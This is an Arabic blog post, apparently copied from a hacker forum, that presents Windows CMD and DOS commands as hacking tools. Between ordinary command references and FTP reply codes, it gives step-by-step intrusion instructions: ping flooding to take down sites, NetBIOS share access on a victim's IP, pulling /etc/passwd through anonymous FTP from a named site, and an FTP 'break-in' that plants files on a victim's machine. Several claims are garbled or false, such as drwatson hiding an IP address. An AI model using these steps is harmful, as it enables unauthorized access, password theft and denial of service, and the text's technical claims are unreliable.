اهم الاوامر التى يستخدمها الهاكر فى الاختراق من خلال الويندوز عن طريق CMD

اوامر CMD


اهم الاوامر التى يستخدمها الهاكر فى الاختراق و التشفير و فك التشفير بالتفصيل : 

اخطر واغرب الأوامر بالدوس للهكر
لتدمير المواقع:
ping -t www.***.com
هذا الأمر يقوم بالضغط على المضيف
ping -t -a -f www.***.com
أماهذا الأمر الشاطر فيقوم باعطاء الاوامر للمستضيف
ping www.***.com
وهذا الأمر يقوم باعطاءك اي بي الموقع ويستخدم الاي بي للتدمير مثلاً بينج "ping "بعدها الاي بي
com/com.wav
com3/com3/.wav
com1/com.wav
وهذه الاوامر للهجوم اكتب الموقع أوهذا الامر أو الاي بي يكون افضل
ping -w timeout www.***.com
وهذا الامر يستعمل لمعرفة سرعة المواقع
NETSTAT -S
هذه المنافذ في جهازك
NETSTAT -A
هذا الامر لترىالمنافذ ومن مرتبط معك بالبروتكل يعني تشوف من يحاول يخترقك
NETSTAT -N
هذا الامر لأخراج الاي بي ارسل اي ملف لمن معك على الماسنجر وهو يحمل اكتبه سيأتيك الاي بي اخر شي على اليمين هذا هو واخر شي على اليسار يوو يعني انت
NETSTAT -P
هذا منافذ البروتكوكل
drwatson
هذا الامر لأخفاء الاي بي
والان هذه اوامر خطيرة
الإختراق عن طريق NetBios Attack
هذه الثغرة تظهر بصورة خاصة إذا ما كان لديك Home Network أو أى نوع اخر من أنواع الشبكات مثل LAN أو WAN أو MAN وغيرها ، أيضا يمكن إختراق حاسبك الشخصى إذا كانت لديك تلك الثغرة.
وللتجربة على نفسك كمثال : أحصل على IP الخاص بجهازك بواسطة هذا البرنامج الصغير ."NetBios Attack"
1- بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 ( هذا الرقم إفتراضى).
2- الان إذهب الى START ثم RUN ثم إكتب CMD لتفتح لك شاشة الدوس .
3- إكتب داخل شاشة الدوس Nbtstat –A IP ADRESS : لا تنسى أن تكتب IP الخاص بك مكان IP ADRESS ، ثم إضغط ENTER .
4- سيظهر لك الجدول التالى :
NetBIOS Remote Machine **** Table
____________________________________
**** Type Status
-------------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
ملحوظة : تم حذف المعلومات الأصلية من الجدول .
5- الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE ، وما يهمنا هنا أن نجد رقم 20 ما بين الأقواس وهذا يعنى أننا لدينا PRINTER OR FILES SHARED TURNED ON ، وهو ما يعنى أننا لدينا شخص لدية ملفات وطابعة يمكن مشاركتها عبر الإنترنت وهذا عيب خطير في أنظمة التشغيل وثغرة خطيرة يمكن إستغلالها في إختراقه.
6- الان يمكنك التعرف على الملفات التى يمكن مشاركتها أو التغيير فيها والتلاعب بها كيفما تشاء وذلك بكتابة الأمر التالى في شاشة الدوس:
Net view \\<insert ip_address here>
7- سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها :
Shared resources at \\ip_address
Share**** Type Comment
MY ********S Disk
TEMP Disk
8- الان يمكنك الدخول الى ملف TEMP والتلاعب فيه :
Net use x: \\<insert IP address here>\temp
طبعا إسلوب NSETBIOS مر بالعديد من التطورات ، نظرا لأن العديد من المستخدمين وأنظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم ، بإذن الله سأقدم الطرق الأخرى الأكثر تطورا في وقت لاحق ..
* لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع
User ****-Password
وهما يكونان محفوظين في ملف يسمي
PASSWD غالبا
بعض المواقع تضع هذا الملف في الإف تي بي
ما هو إف تي بي؟
FTP=File Transfer Protocol بروتوكول نقل الملفات
تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت
start==>run إبدأ ثم تشغيل
واكتب telnet
سيفتح التلنت اضغط علىRemote System ==> connect
ثم اكتب الموقع في Host **** مثلا
kahane.org أو الآيبي الخاص به
وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي
ثم اضغط connect
وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code
user anonymous
ثم انتر بعدها يطلب السيرفر كلمة السر اكتب
passtttttttt@yahoo.com
اكتب أي بريد ككلمة سر وطبعا سيكون وهميا
ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..
بعدها سنحصل على ملف الباسوورد
قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل
cute ftp - ws_ftp
مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان
ftp.kahane.org
لتحصل على الملف في التلنت اكتب
retr /etc/passwd
/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع
Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز ******s/passwd
وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl
بعض الاوامر الخاصه بالويندوز
DIR استعراض للدايروكتوري DIR
CLS ابقاء شاشة الدوس خالية من الاوامر CLS
RD حذف مجلد RD
MD انشاء مجلد MD
DATE تعديل التاريخ DATE
TIME تعديل الوقت TIME
LABLE عرض وتعديل اسم الدرايف LABLE
VOL عرض اسم الدرايف VOL
VER لمعرفة اي اصدراة من الدوس تعمل بها VER
FORMAT C: او غيره حذف اي شئ يكون على الدرايف الواحد FORMAT
TYPE اسم الملف عرض الملفات النصية فقط TYPE
DEL اسم الملف حذف ملف معين DEL
REN اسم الملف اعادة تسمية ملف معين REN
COPY مسار الملف او المجلد نسخ مجلد معين او ملف محدد COPY
PROMPT تغيير شكل المؤشر PROMPT
XCOPY نسخ مجلد يحتوي على مجلدات فرعية بداخله XCOPY
DEFRAG الغاء تجزئة القرص DEFRAG
SCANDISK عمل فحص للهارديسك SCANDISK
SYS نقل ملفات النظام الى القرص المرن SYS
UNDELET استرجاع ملف حذفته من جهازك او حتى من سلة المحذوفات لكن يشترط ان لا يمر اكثر من اسبوع كحد أقصى على مدة الحذف UNDELET
FIND اسم الملف او المجلد بحث FIND
DOSKEY لعمل حفظ للأوامر اللتي استعملتها DOSKEY
MASV فاحص للفيروسات MSAV
MSBACKUP لعمل نسخة احتياطية للجهاز MSBACKUP
MEM عرض بيان عن الذاكرة رام MEM
CHKDSK فحص الهارديسك CHKDSK
DISKCOP للمقارنة بين ديسكات ذات حجم متساوي DISKCOP
TREE عرض كل مايحتويه الدرايف الواحد TREE
CD للإنتقال من مجلد الى آخر CD
اوامر الدوس
الأمر
شرح عن الأمر
اشكالة
DIR
يعرض هذا الأمر محتويات القرص او الدليل
DIR/P <> DIR/W <> DIR/P/W <> DIR .الامتدار(EXE) .
CD
للدخول و الخروج من المجلد
CD اسم المجلد(CD ******S) <> CD.. <> CD\ .
MD
لإنشاء مجلد
MD اسم المجلد( MD DRH ) .
REN
لتغير اسم الملف او تغير اسم المجلد
REN اسم الملف او المجلد REN AHMED.TXT ALI.TXT
COPY
لنسخ ملف او نسخ مجلد
COPY اسم الملف او المجلد COPY OMAR.TXT A: <> COPY *.* A: <> COPY *.TXT A: <> COPY OMAR.* A: <>COPY. A:\ OMAR
XCOPY
لنسخ قرص مرن الى قرص مرن
XCOPY A: A:
COPY CON
لإنشاء ملف
COPY CON OMAR.TXT .
MEMMAKER
لترتيب محتويات الذاكرة
MEMMAKER
DEFRAG
لترتيب المفات على القرص الصلب
DEFRAG
FDISK
يعمل هذا الامر على تقسيم القرص الصلب
FDISK
FORMAT
يهلم هذا الامر على تهيئة الجهاز ومسح البيانات
FORMAT محرك الاقراص (FORMAT C
COPY.....PRI
هذا الامر يطبع الملفات من الدوس
COPY OMAR.TXT PRI
ملاحظة
كل هذا الاوامر تكتب عند محث الدوس
C:\ DIR
C:\ MD DRH <> C:\ COPY OMAR.TXT A:...........الخ
أوامر الدوس
الامر
الوظيفة
TIME
لمعرفه الوقت مع امكانيه التعديل
DATE
معرفه التاريخ مع امكانيه التعديل
DIR
عرض محتويات الإسطوانة الصلبة او المرنة
DIR/P عرض المحتويات صفحه صفحه
DIR/W عرض المحتويات بصورة مستعرضة
DIR/O عرض الفهارس اولاً ثم الملفات مع الترتيب
DIR/AD عرض الفهارس فقط
DIR/B عرض محتوى الاسطوانه الصلبه او المرنه بدون الحجم والتاريخ والوقت
DIR/L عرض محتوى الاسطوانه الصلبه بالحروف الصغيره
DIR/S عرض جميع الملفات والبحث عن ملف معين
DIR->PRN طباعة محتوى الاسطوانه على الورقة
DIR->ASH عرض الفهارس والملفات المخفيه
DIR-*.SYS عرض الملفات التي لها امتداد SYS
DIR-config.*f عرض ملفات config باي امتداد
DIR-C*.*A عرض الملفات التي تبدا بحرف ال C
DIR-??M*.*A عرض الملفات التي يكون الحرف الثالث لها M
VOL معرفة اسم الاسطوانة الصلبة او المرنة
CLS تنظيف الشاشة (اي مسح البيانات الموجوده)
VER معرفة نوع اصدار الدوس
DOSKEY أمر تخزين أوامر نظام الدوس
COPY-CON-(file ****)f إنشاء ملف جديد
COPY-(file ****)-CON أمر عرض محتوى الملف
COPY-(file ****)-prn امر طباعة محتويات الملف
COPY امر نسخ الملفات
DEL أمر مسح ملف أو مجموعه ملفات
UNDELETE امر استرجاع الملفات التي تم حذفها
MEM معرفه حجم الذاكره
SORT
فرز وترتيب محتويات الملف
PROMPT تغيير شكل المحث
FIND بحث عن كلمه او عبارة داخل ملف
CD/Aاو CD..D الخروج من الدليل
SYS إعداد قرص نظام التشغيل
SCANDISK فحص الاسطوانه
FORMAT عمل تهيئة للإسطوانة
أختراق الأجهزة با الدوس طريقه ناجحه 100
طريقة إقتحام عبر فتيبي
FTP
أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت
21
مفتوح و هو البورت الخاص بــ
FTP
و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها
Superscanne
بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي
إضغط على
Start
ثم
Run
ثم اكتب
ftp –n
تطلع لك نافدة في الدوس مكتوب عليها
FTP>
لحد هنا كل شيء تمام
و بعدين اكتب
Open
ثم إضغط على
إدخال
Enter
تتحصل عب النتيجة التالية
FTP>
To
أكتب جنب
To
رقم IP الضحية ثم إضغط على إدخال
و الحين اهم جزء
إدا تحصلت على هذا الرد فقد تخطيت خطوة
Connected to www.assassin.com
220 ***srv1 Microsoft FTP Service (Version 4.0).
و الآن أكتب الكتابة التالية
ftp>quote user ftp
إدا تحصلت على هذا الرد فقد تخطيت خطوة
331 Anonymous acces allowed, send identify (e-mail ****) as password.
و الآن أكتب الكتابة التالية
ftp>quote cwd ~root
إدا تحصلت على هذا الرد فقد تخطيت خطوة
530 Please login with USER and PASS
ثم أكتب الكتابة التالية
ftp>quote pass ftp
إدا تحصلت على هذا الرد فقد تخطيت خطوة
و نجحت في الإقتحام يعني الاختراق
230 Anonymous user logged in.
مبرووووك انت الحين في جهاز المسكين ذا الي بتحوسه
ما عليك الآن الا ان تقوم بإستعمال
اوامر الفتيبي
و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي و إذا اردتم ان تضحكو بقاليأكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء وعشان كذا
قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق
Pwd
لكي تعر ما يحتويه الهارد ديسك
Cd
لإقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
لكي تحمل الى سطح المكتب بتاع جهازك
الموضوع الأصلى من هنا: منتديات القرصان http://www.alkrsan.net/…/16458-cune-aecion-caecan-caiaeo-aa…
مثال
Get black.exe
Put
العملية الع**ية ل
Get
يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Clos
لقطع الإتصال مع الضحية
هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها
Codes: Signification:
110 Restart marker reply.
120 Service ready in nnn minutes. (nnn est un temps)
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message.
215 **** system type.
220 Service ready for new user.
221 Service closing control connection.
225 Data connection open; no transfer in progress.
226 Closing data connection.
227 Entering passive mode (h1, h2, h3, h4, p1, p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATH****" created.
331 User **** okay, need password.
332 Need account for login.
350 Requested file action pendingfurther information.
421 Service not available, closing control connection.
425 Can't open data connection.
426 Connection closed; transfer aborded.
450 Requested file action not taken. (Fichier déjà utilisé par autre chose)
451 Requested action aborded: local error processing.
452 Requested action not taken. (Pas assez de mémoire pour exécuter l'action)
500 Syntax error, command unrecognized.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. (Fichier non trouvé, pas d'accès possible,...)
551 Requested action aborded: page type unknown.
552 Requested file action aborded.
553 Requested action not taken. (Nom de fichier non attribué)
-----------اهم اكواد نيستات---------
إحصائيات نظام عروض ونظام السيطرة على الارسال الحالي / إرتباطات شبكة آي بي.
نيتستات [-a] [-e] [-n] [-o] [-s] [-p أوّلي] [-r] [فترة]
-a يعرض كلّ الإرتباطات والموانئ المستمعة.
-e يعرض إحصائيات الإيثرنت. هذا قد يندمج معه -s
الخيار.
-n يعرض العناوين وأرقام المنافذ في الشكل العددي.
-o يعرض هوية عملية الإمتلاك إرتبطت بكلّ إتّصال.
-p أوّلي يشوّف الإرتباطات للنظام حدّدت بالأوّلي؛ الأوّلي
قد يكون أيّ: نظام السيطرة على الارسال، يو دي بي، تي سي بي في 6، أو يو دي بي في 6. إذا مستعمل مع -s
الخيار للعرض لكلّ إحصائيات نظام، أوّلي قد يكون أيّ:
آي بي، آي بي في 6, آي سي إم بي، آي سي إم بي في 6، نظام السيطرة على الارسال، تي سي بي في 6, يو دي بي، أو يو دي بي في 6.
-r يعرض منضدة التوجيه.
-s عروض لكلّ إحصائيات نظام. بالأساس، إحصائيات
معروض لآي بي، آي بي في 6, آي سي إم بي، آي سي إم بي في 6، نظام السيطرة على الارسال، تي سي بي في 6, يو دي بي، ويو دي بي في 6؛
-p خيار قد يستعمل لتحديد مجموعة ثانوي من التقصير.
إختارت الفترة ريديسبلايس الإحصائيات، يوقف ثواني الفترة
بين كلّ عرض. السيطرة الصحفي + سي لتوقّف إعادة عرض
الإحصائيات. إذا محذوف , netstat سيطبع التيار
معلومات ترتيب سابقا

youtube : https://www.youtube.com/channel/UC2EDKGPNHlpuKTRt_6qeezA
instagram : https://www.instagram.com/a7medmo7ammed.d/
soundcloud : https://soundcloud.com/blackwolf13
twitter : https://twitter.com/770AhmedMohamed
facebook : https://www.facebook.com/blackwolf660/
website : https://black66flash00.wixsite.com/blackwolf
E-mail : black66flash00@gmail.com

ask.fm : https://ask.fm/A7medMo7ammed770

شكرا على متابعة المقالة , شارك المقالة مع اصدقائك و اقاربك ليستفيدون هم ايضا

ليست هناك تعليقات:

إرسال تعليق

يمكن لاى شخص ابداء رائيه , شكرا على قراءة المقالة للاخرة , و ارجو ان تكون افادتكم المقالة